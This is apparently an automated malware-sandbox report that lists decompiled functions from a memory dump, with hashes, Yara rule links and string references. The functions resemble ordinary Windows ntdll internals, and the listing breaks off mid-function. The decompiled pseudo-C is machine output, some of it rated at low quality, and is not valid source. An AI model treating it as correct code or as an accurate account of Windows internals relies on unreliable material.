                                                    • API ID:
                                                    • String ID: `
                                                    • API String ID: 0-2679148245
                                                    • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                    • Instruction ID: d7047363919048e363fb66940f775d6003dd3c0d23a101948180f6780be404e2
                                                    • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                    • Instruction Fuzzy Hash: CE31E232304305ABE720DE26CC45F9A77DAAB85758F044229FD54EB690DA70FA44D791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04BC3884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 72%
                                                    			E04BC3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E04B89650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L04B64620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E04B89650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                    0x04bc3893
                                                    0x04bc3896
                                                    0x04bc3899
                                                    0x04bc389f
                                                    0x04bc38a0
                                                    0x04bc38a4
                                                    0x04bc38a9
                                                    0x04bc38ac
                                                    0x04bc38ad
                                                    0x04bc38ae
                                                    0x04bc38af
                                                    0x04bc38b1
                                                    0x04bc38b4
                                                    0x04bc38bb
                                                    0x04bc38bc
                                                    0x04bc38bd
                                                    0x04bc38c4
                                                    0x04bc38c8
                                                    0x04bc38ca
                                                    0x04bc38ca
                                                    0x04bc38d5
                                                    0x04bc393e
                                                    0x04bc3940
                                                    0x04bc3942
                                                    0x04bc3952
                                                    0x04bc3954
                                                    0x04bc3961
                                                    0x04bc3961
                                                    0x04bc3967
                                                    0x04bc396e
                                                    0x04bc396e
                                                    0x04bc3947
                                                    0x04bc394c
                                                    0x00000000
                                                    0x04bc394c
                                                    0x04bc38ea
                                                    0x04bc38ee
                                                    0x04bc38f8
                                                    0x04bc38f9
                                                    0x04bc38ff
                                                    0x04bc3900
                                                    0x04bc3902
                                                    0x04bc3903
                                                    0x04bc390b
                                                    0x04bc390f
                                                    0x04bc3950
                                                    0x00000000
                                                    0x04bc3950
                                                    0x04bc3915
                                                    0x04bc391d
                                                    0x04bc391d
                                                    0x04bc3922
                                                    0x04bc3926
                                                    0x00000000
                                                    0x04bc3928
                                                    0x04bc392b
                                                    0x04bc392b
                                                    0x04bc3935
                                                    0x04bc3937
                                                    0x04bc3937
                                                    0x00000000
                                                    0x04bc3935
                                                    0x04bc3926
                                                    0x04bc38f0
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: BinaryName
                                                    • API String ID: 2994545307-215506332
                                                    • Opcode ID: 2186af19bfb2ebc376c75c000ebb093e9f3f976b6fa6ca0d18b2309139ee5f02
                                                    • Instruction ID: 20f0fdea54fbf3a3d50d8895e6cd6001a823092a655e7ea8ac7786d3e4c69e00
                                                    • Opcode Fuzzy Hash: 2186af19bfb2ebc376c75c000ebb093e9f3f976b6fa6ca0d18b2309139ee5f02
                                                    • Instruction Fuzzy Hash: F931F472900519EFEB25DA58C985D7BB7B4EB90720F0181ADED16A7690D670FE00C7A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B7D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 33%
                                                    			E04B7D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x4c3d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E04B64120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E04B8B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E04B898D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E04B895D0();
					L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                    0x04b7d29c
                                                    0x04b7d2a6
                                                    0x04b7d2b1
                                                    0x04b7d2b5
                                                    0x04b7d2b6
                                                    0x04b7d2bc
                                                    0x04b7d2bd
                                                    0x04b7d2be
                                                    0x04b7d2bf
                                                    0x04b7d2c2
                                                    0x04b7d2c4
                                                    0x04b7d2cc
                                                    0x04b7d384
                                                    0x04b7d34b
                                                    0x04b7d34f
                                                    0x04b7d350
                                                    0x04b7d351
                                                    0x04b7d35c
                                                    0x04b7d35c
                                                    0x04b7d2d6
                                                    0x04b7d2da
                                                    0x04b7d2e1
                                                    0x04b7d361
                                                    0x04b7d369
                                                    0x04b7d36d
                                                    0x04b7d2e3
                                                    0x04b7d2e3
                                                    0x04b7d2e3
                                                    0x04b7d2e5
                                                    0x04b7d2ed
                                                    0x04b7d2f5
                                                    0x04b7d2fa
                                                    0x04b7d302
                                                    0x04b7d303
                                                    0x04b7d30b
                                                    0x04b7d30f
                                                    0x04b7d313
                                                    0x04b7d318
                                                    0x04b7d31c
                                                    0x04b7d320
                                                    0x04b7d379
                                                    0x04b7d37d
                                                    0x00000000
                                                    0x00000000
                                                    0x04bbaffe
                                                    0x04bbb001
                                                    0x04bbb011
                                                    0x00000000
                                                    0x04b7d322
                                                    0x04b7d322
                                                    0x04b7d330
                                                    0x04b7d337
                                                    0x04b7d35d
                                                    0x04b7d339
                                                    0x04b7d33f
                                                    0x04b7d38c
                                                    0x04b7d38c
                                                    0x04b7d33f
                                                    0x04b7d349
                                                    0x00000000
                                                    0x04b7d349

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @
                                                    • API String ID: 0-2766056989
                                                    • Opcode ID: 64262cc1f40a1cbd8baec28ec2345d59cd7ce306faa3aa70375722c42642aa98
                                                    • Instruction ID: 1acd9bbb189e3ab5ddb57da58640a1c7d25d346c589cb064da857681f04f9395
                                                    • Opcode Fuzzy Hash: 64262cc1f40a1cbd8baec28ec2345d59cd7ce306faa3aa70375722c42642aa98
                                                    • Instruction Fuzzy Hash: 253195B16083059FD711DF28C98096BBBECEF85794F01096EF5A593210E638ED04DBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B51B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 72%
                                                    			E04B51B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E04B8BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E04B8A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E04B8A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L04B64620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                    0x04b51b8f
                                                    0x04b51b9a
                                                    0x04b51b9c
                                                    0x04b51b9e
                                                    0x04b51ba3
                                                    0x04ba7010
                                                    0x04ba7010
                                                    0x00000000
                                                    0x04b51ba9
                                                    0x04b51ba9
                                                    0x04b51bae
                                                    0x00000000
                                                    0x04b51bc5
                                                    0x04b51bca
                                                    0x04b51bcf
                                                    0x04b51bd0
                                                    0x04b51bd1
                                                    0x04b51bd2
                                                    0x04b51bd6
                                                    0x04b51bdc
                                                    0x04b51be0
                                                    0x04ba6ffc
                                                    0x04ba7000
                                                    0x00000000
                                                    0x04ba7006
                                                    0x04ba7009
                                                    0x04ba7009
                                                    0x04b51be6
                                                    0x04b51bec
                                                    0x04b51c0b
                                                    0x04b51c0b
                                                    0x04b51c0c
                                                    0x04b51c11
                                                    0x04b51c12
                                                    0x04b51c15
                                                    0x04b51c1b
                                                    0x04b51c1f
                                                    0x04b51c31
                                                    0x04b51c33
                                                    0x04ba7026
                                                    0x04ba7026
                                                    0x04b51c21
                                                    0x04b51c24
                                                    0x04b51c24
                                                    0x04b51bee
                                                    0x04b51bee
                                                    0x04b51bf2
                                                    0x04b51c3a
                                                    0x04b51bf4
                                                    0x04b51bf4
                                                    0x04b51c05
                                                    0x04b51c05
                                                    0x04b51c09
                                                    0x04b51c3e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04b51c09
                                                    0x04b51bec
                                                    0x04b51be0
                                                    0x04b51bae
                                                    0x04b51c2e

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID: WindowsExcludedProcs
                                                    • API String ID: 0-3583428290
                                                    • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                    • Instruction ID: 0d4e81c4cd5854808c052ee5e1ba5dad5653a2c2d407d84f0e2c1b146aa88140
                                                    • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                    • Instruction Fuzzy Hash: 1C21D376A08228ABDB229A9D8840F6BB7BDEB41750F0544E6BD149F210EA35FD10D7A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B6F716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E04B6F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                    0x04b6f71d
                                                    0x04b6f722
                                                    0x04b6f726
                                                    0x04bb4770
                                                    0x04b6f765
                                                    0x04b6f769
                                                    0x04b6f769
                                                    0x04b6f732
                                                    0x04bb477a
                                                    0x00000000
                                                    0x04bb477a
                                                    0x04b6f738
                                                    0x04b6f73a
                                                    0x04b6f73c
                                                    0x04b6f73f
                                                    0x04b6f746
                                                    0x04b6f778
                                                    0x04b6f7a9
                                                    0x04b6f7a9
                                                    0x04b6f754
                                                    0x04b6f75a
                                                    0x04b6f75d
                                                    0x04b6f75f
                                                    0x04b6f761
                                                    0x04b6f76f
                                                    0x04b6f771
                                                    0x04b6f771
                                                    0x04b6f76f
                                                    0x04b6f763
                                                    0x00000000
                                                    0x04b6f763
                                                    0x04b6f77d
                                                    0x04b6f7a3
                                                    0x04b6f7a5
                                                    0x00000000
                                                    0x04b6f7a5
                                                    0x04b6f77f
                                                    0x04b6f782
                                                    0x04b6f784
                                                    0x04b6f786
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04b6f788
                                                    0x04b6f748
                                                    0x04b6f74d
                                                    0x04b6f78d
                                                    0x04b6f793
                                                    0x04b6f7b7
                                                    0x04b6f7bc
                                                    0x00000000
                                                    0x04b6f7bc
                                                    0x04b6f798
                                                    0x00000000
                                                    0x00000000
                                                    0x04b6f79d
                                                    0x04b6f7b0
                                                    0x00000000
                                                    0x04b6f7b0
                                                    0x04b6f79f
                                                    0x00000000
                                                    0x04b6f74f
                                                    0x04b6f74f
                                                    0x00000000
                                                    0x04b6f74f

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Actx
                                                    • API String ID: 0-89312691
                                                    • Opcode ID: a11f84833a0aa7b3e5a2daecfe8eacc36341dc2ae81f32a2126be86e5ac52d86
                                                    • Instruction ID: 297017934d437013d149a1cb0084623f31bde2ce73adf01a5a51c9952056d323
                                                    • Opcode Fuzzy Hash: a11f84833a0aa7b3e5a2daecfe8eacc36341dc2ae81f32a2126be86e5ac52d86
                                                    • Instruction Fuzzy Hash: EA11EF353046028BEB244E1DA990736729AFB96364F2445BAE873CB391EB7CF8009780
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04BF8DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 71%
                                                    			E04BF8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x4c20d50);
				E04B9D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E04BD5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L04B9DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L04B9DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E04B9D130(_t34, _t39, _t40);
			}





                                                    0x04bf8df1
                                                    0x04bf8df1
                                                    0x04bf8df1
                                                    0x04bf8df1
                                                    0x04bf8df1
                                                    0x04bf8df1
                                                    0x04bf8df3
                                                    0x04bf8df8
                                                    0x04bf8dfd
                                                    0x04bf8e00
                                                    0x04bf8e0e
                                                    0x04bf8e2a
                                                    0x04bf8e36
                                                    0x04bf8e38
                                                    0x04bf8e3c
                                                    0x04bf8e46
                                                    0x04bf8e46
                                                    0x04bf8e36
                                                    0x04bf8e50
                                                    0x04bf8e56
                                                    0x04bf8e59
                                                    0x04bf8e5c
                                                    0x04bf8e60
                                                    0x04bf8e67
                                                    0x04bf8e6d
                                                    0x04bf8e73
                                                    0x04bf8e74
                                                    0x04bf8eb1
                                                    0x04bf8ebd

                                                    Strings
                                                    • Critical error detected %lx, xrefs: 04BF8E21
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Critical error detected %lx
                                                    • API String ID: 0-802127002
                                                    • Opcode ID: 12fda3569f0f490acb6d8b333a231dbd5fd24ac83ce18768e4ed51e250a3b607
                                                    • Instruction ID: cb310887da572d05aecf7dc31dd428d7c5258e09bd1514acd198a414bbe909f0
                                                    • Opcode Fuzzy Hash: 12fda3569f0f490acb6d8b333a231dbd5fd24ac83ce18768e4ed51e250a3b607
                                                    • Instruction Fuzzy Hash: 33118B75D00348EBEF24DFA98A057DCBBB4FB04314F2046AED228AB291D3302A06CF14
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04BDFF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 04BDFF60
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                    • API String ID: 0-1911121157
                                                    • Opcode ID: a2da3c05056952d9f8a95267ee45d4ae5190d262020d1ae3631d097edbf7c4c4
                                                    • Instruction ID: 3bcb19aa58d3270acab3c8b274af3bf9c5ab9b6b85da6e67544b355a7f24fe71
                                                    • Opcode Fuzzy Hash: a2da3c05056952d9f8a95267ee45d4ae5190d262020d1ae3631d097edbf7c4c4
                                                    • Instruction Fuzzy Hash: B411AD76911148EFEF26EF50C949FA8BBB2FF08709F1480D4E5096B2A1D739B940DB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04C15BA5, Relevance: .6, Instructions: 592COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 88%
                                                    			E04C15BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x4c21178);
				E04B9D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E04C14C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E04B8D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E04C15542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x4c360e8;
								if( *0x4c360e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x4c360e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E04B89710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
